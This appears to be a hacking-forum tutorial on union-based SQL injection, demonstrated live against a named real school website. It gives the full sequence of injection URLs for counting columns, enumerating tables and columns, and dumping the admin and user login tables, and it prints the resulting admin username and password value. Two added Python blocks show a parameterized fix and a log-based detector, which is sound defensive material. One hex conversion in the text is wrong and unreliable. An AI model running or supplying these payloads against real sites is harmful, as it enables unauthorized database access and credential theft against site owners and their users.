
SQL Injection [Union Based]
#1
(This post was last modified: 08-16-2017, 07:50 PM by Mike.)

"Daisuke's katana can slay any security" 
==========================
 
 
SQL Injection Union Based (Tutorial with screens)

 
0x00FFF#~ Summary 
0x1 - Introduction 
0x2 - Attack 
0x3 - Links 
0x4 - Credits & Authors

 
 
0x1#~ Introduction 
 
# What is SQL Injection? 
A SQL injection attack consists of the insertion or "injection" of SQL via the input data sent from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), and execute administrative operations on the database.
 
[?] Info: 
- It's a flaw in the web application, not in the database or the server. 
- It can be injected through cookies, forms and URL parameters.

 
(What are cookies? http://en.wikipedia.org/wiki/HTTP_cookie)
 
# Why UNION? 
The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of columns of other tables.  
 
0x2#~ Attack 
 
# Here is a list of d0rks to find SQL vulnerabilities: 
A lot of these sites have already been hacked by other people, but the list is useful for training!
 
#------------------------------------------------------------------------------------+ 
| I found a vulnerable website; I am not responsible for your damage. 
| I prefer to make the tutorial on a real site so that it's a real situation. 
#------------------------------------------------------------------------------------+ 
 
#[1] Find the vulnerable parameter 
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 (no error) 
hxxp://dbhspgoa.edu.in/Article.php?id=92' (error)
 
"Why an error? I don't see any error message :s ???" 
That's normal; in this case the error is the blank page: 
[Image: iPfh7Uw.png]
 
 
#[2] Find the number of columns 
To get to the point: we're going to find how many columns the query returns by using the same error/no-error test. 
 
Start by entering order by 100--
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 100-- (error) 
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 50-- (error) 
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 15-- (error) 
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 10-- (error) 
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 9-- (no error)
 
 
The page displays correctly, so there are 9 columns:
[Image: F86KJsY.png]
 
 
#[3] Time to execute the UNION SELECT statement 
We have to select 9 columns to match the original query: 
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 union select 1,2,3,4,5,6,7,8,9--
 
Wow, the number 4 appears: the 4th column is the one that gets displayed on the page, so that's where we'll extract the database information from: 
[Image: lCSZvNf.png]
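To show why the error/no-error tests in steps 1 to 3 behave the way they do, here is an added Python/SQLite example (not code from the original post) that mimics the vulnerable lookup beside a parameterized one. The table layout, column names and the single article row are constructed.

```python
import sqlite3

# Constructed stand-in for the page's Article.php backend: a 9-column table, one row with id 92.
COLUMNS = ["id", "title", "author", "body", "c5", "c6", "c7", "c8", "c9"]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE article (%s)" % ", ".join(COLUMNS))
    db.execute("INSERT INTO article VALUES (92, 'Hello', 'staff', 'Body text', 5, 6, 7, 8, 9)")
    return db

def vulnerable_lookup(db, id_param):
    """Mimics the bug: the raw request parameter is pasted into the SQL text."""
    sql = "SELECT * FROM article WHERE id=" + id_param   # the injection point
    return db.execute(sql).fetchone()                    # None when nothing matches

def probe(db, id_param):
    """The tutorial's blank-page test: returns ('error'|'no error', row)."""
    try:
        return "no error", vulnerable_lookup(db, id_param)
    except sqlite3.Error:      # 'order by 10' on 9 columns, a stray quote, etc.
        return "error", None

def safe_lookup(db, id_param):
    """Hardened: the value must be an integer and is bound as a parameter, never concatenated."""
    article_id = int(id_param)   # ValueError for anything that is not a plain number
    return db.execute("SELECT * FROM article WHERE id=?", (article_id,)).fetchone()

def safe_probe(db, id_param):
    """Same test against the hardened lookup: injected text is rejected before any SQL runs."""
    try:
        return "ok", safe_lookup(db, id_param)
    except ValueError:
        return "rejected", None

if __name__ == "__main__":
    db = make_db()
    for p in ["92", "92'", "92 order by 10--", "92 order by 9--",
              "92 and 0 union select 1,2,3,4,5,6,7,8,9--"]:
        print(repr(p), "->", probe(db, p), "| hardened:", safe_probe(db, p)[0])
```

With `and 0` the original row is suppressed, so the only row left is the constant row from the UNION, which is why the marker column shows up on the page.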
 
 
#[4] Information 
 
Now that we know where to inject, you can gather some information about the database using concat(<function>): 
 
Examples: 
- version() 
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(version()),5,6,7,8,9--
 
[Image: GzQpvav.png]
 
- @@datadir 
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,@@datadir,5,6,7,8,9--
 
[Image: cfrF1is.png]
 
- @@hostname 
Hmm I don't know why it doesn't work on this site :s 
 
- database() 
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT+1,2,3,concat(database()),5,6,7,8,9--
 
[Image: QFslYdF.png]
 
- user() 
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(user()),5,6,7,8,9--
 
[Image: Wg2XTzz.png]
 
- show all 
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(database(),0x3c62723e,version(),0x3c62723e,@@datadir,0x3c62723e,user()),5,6,7,8,9--
 
0x3c62723e is the string <br> converted to hex (3c 62 72 3e) with the 0x prefix, so each value is shown on its own line. 
[Image: qAa4dLp.png]
 
 
First let's look at the functions we're going to use to extract table names (important): 
Quote: 
group_concat = groups several values into one string so they fit in the single displayed column 
table_name = the table names to be shown on screen 
from = the location (table) the statement reads from 
information_schema.tables = the system table that lists every table in the database 
table_schema = the database (schema) a table belongs to 
database() = the current database used by the website 
0x0a = hex for a newline, used to put each table name on its own line
 
 
#[5] Show all tables of the database
I apply the functions mentioned above: 
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(table_name,0x0a),5,6,7,8,9 from information_schema.tables where table_schema=database()--
 
 
You should see this: 
Code:
allumni ,article ,attendance_setting ,banner ,banner_zone ,content ,course ,csv ,division ,events ,ex_student ,exam_desc ,exam_setting ,exam_subjtotal ,exam_type ,final_grading ,grace ,grade_subject ,grading ,groups ,lecture_attendance ,login ,login_admin ,magazines ,mrksht ,navigation ,news ,notice ,photo_category ,photo_details ,pictures ,school_accnt ,schooldays_total ,semester ,standard ,standard_desc ,stream_desc ,stud_history ,stud_score ,student ,student_admission ,student_attendance ,student_exam ,student_grace ,student_grade ,student_gradesubject ,student_subject ,student_ya ,student_yrassessment ,subject ,tags ,tb_excelupload ,tb_quicklinks ,tb_videos ,teacher ,teacher_classes ,teacher_sub_assign ,teacher_subjects ,template ,thoughtforday ,year_assessment ,year_desc
 
 
Wow, there are two interesting tables: login and login_admin! Hmm, "admin", I love this kind of table :troll: 
[Image: zlIhpuG.png]
 
 
#[6] Extract data from columns 
 
'login' seems to have the users' information stored in it. 
'login_admin' seems to have the admins' information stored in it. 
 
To do this, we're going to have to alter the query a bit. Look closely at this syntax: 
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e-- 
 
 
We need to replace: 
table_name = replaced by "column_name" 
information_schema.tables = replaced by "information_schema.columns" 
table_schema = replaced by "table_name" 
database() = replaced by "0x6c6f67696e5f61646d696e--" (login_admin in hex) 
 
A hex literal is written with "0x" at the beginning. To query that table with the syntax above, we have to convert the table name to hex. If you are using the Firefox HackBar like me, you can do it this way: 
 
[Image: sfYjirc.png] 
 
And the result will be: 0x44616973756b65a 
 
[Image: ofq1KlS.png] 
 
Or: http://www.string-functions.com/hex-string.aspx 
 
So! After running the injection against the table login_admin, we get 4 columns: admin_id, usernme, passwrd, logtime 
[Image: MIyNZpo.png]
 
 
Let's look at the functions we replaced and what they do: 
Quote: 
group_concat(column_name,0x0a) = groups the column names we're going to extract, one per line 
information_schema.columns = the system table that lists the columns of every table in the database 
table_name = restricts the query to the columns of one specific table 
0xHEX_Code_Table = the table name converted to hex 
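From the defender's side, here is an added Python example (not part of the original tutorial) that scans access-log lines for the probing sequence described in steps 2 to 6 and decodes the 0x hex literals, so the table a request was aimed at (here 0x6c6f67696e5f61646d696e) is readable in the alert. The log lines, timestamps and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access-log lines mirroring the tutorial's requests (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [16/Aug/2017:19:50:01 +0000] "GET /Article.php?id=92 HTTP/1.1" 200 5120
203.0.113.5 - - [16/Aug/2017:19:50:09 +0000] "GET /Article.php?id=92%20order%20by%2010-- HTTP/1.1" 200 0
203.0.113.5 - - [16/Aug/2017:19:50:31 +0000] "GET /Article.php?id=92%20and%200%20UNION%20SELECT%201,2,3,group_concat(column_name,0x0a),5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=0x6c6f67696e5f61646d696e-- HTTP/1.1" 200 4096
198.51.100.7 - - [16/Aug/2017:19:51:00 +0000] "GET /Article.php?id=93 HTTP/1.1" 200 5100
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\d+|-)')
HEX_RE = re.compile(r'0x([0-9a-fA-F]{2,})')

# Signatures for the stages of the tutorial's injection, checked on the URL-decoded parameter value.
SIGNATURES = {
    "order_by_probe":     re.compile(r"\border\s+by\s+\d+", re.I),        # column counting
    "union_select":       re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),  # table/column enumeration
    "comment_terminator": re.compile(r"--\s*$|#\s*$"),                   # trailing -- or #
}

def decode_hex_literals(text):
    """Turn every 0x... literal in the value back into text (0x0a -> newline, 0x6c6f... -> 'login_admin')."""
    decoded = []
    for m in HEX_RE.finditer(text):
        digits = m.group(1)
        if len(digits) % 2:            # odd length cannot be a byte string
            continue
        try:
            decoded.append(bytes.fromhex(digits).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded

def analyze_line(line):
    """Return a finding dict for a suspicious request, or None for a benign one."""
    m = REQ_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    params = {}
    for name, value in parse_qsl(query, keep_blank_values=True):   # parse_qsl URL-decodes the value
        hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if hits:
            params[name] = {"hits": hits, "hex_strings": decode_hex_literals(value), "value": value}
    if not params:
        return None
    # A 200 with an empty body is the "blank page" error the tutorial relies on; keep the size for triage.
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
            "size": m.group("size"), "params": params}

def scan_log(text):
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["size"], finding["params"])
```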
 
 
Results: 
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(admin_id,0x0a,passwrd,0x0a,logtime,0x0a,usernme,0x0a),5,6,7,8,9 from login_admin--
 
 
It shows the admin credentials: 

admin_id | passwrd          | logtime             | usernme 
---------+------------------+---------------------+-------- 
1        | 3¢PÉÜœz;þß„mJ…   | 2014-02-11 01:25:09 | admin 
 
[Image: JumnMiy.png]
 
 
You can try with any table you want. I use the same injection for the table login: 
 
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e--
 
 
[Image: WFma7bu.png] 
 
Then 
 
Quote: 
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(a_id,0x0a,aname,0x0a,apass,0x3c62723e),5,6,7,8,9 from login--
 
 
[Image: OHWS0B2.png] 
 
The final dump: 
 
 
____________________________________________________________ 
 
0x3#~ Links 
- http://hakipedia.com/index.php/SQL_Injection 
- http://hex.online-toolz.com/tools/text-h...vertor.php 
- https://www.owasp.org/index.php/XSS_Filt...heat_Sheet 
 
0x4#~ Credits & Authors 
Daisuke Dan - TheHackersBay 
Penetration testing, Research Team 
 
Have a nice day !


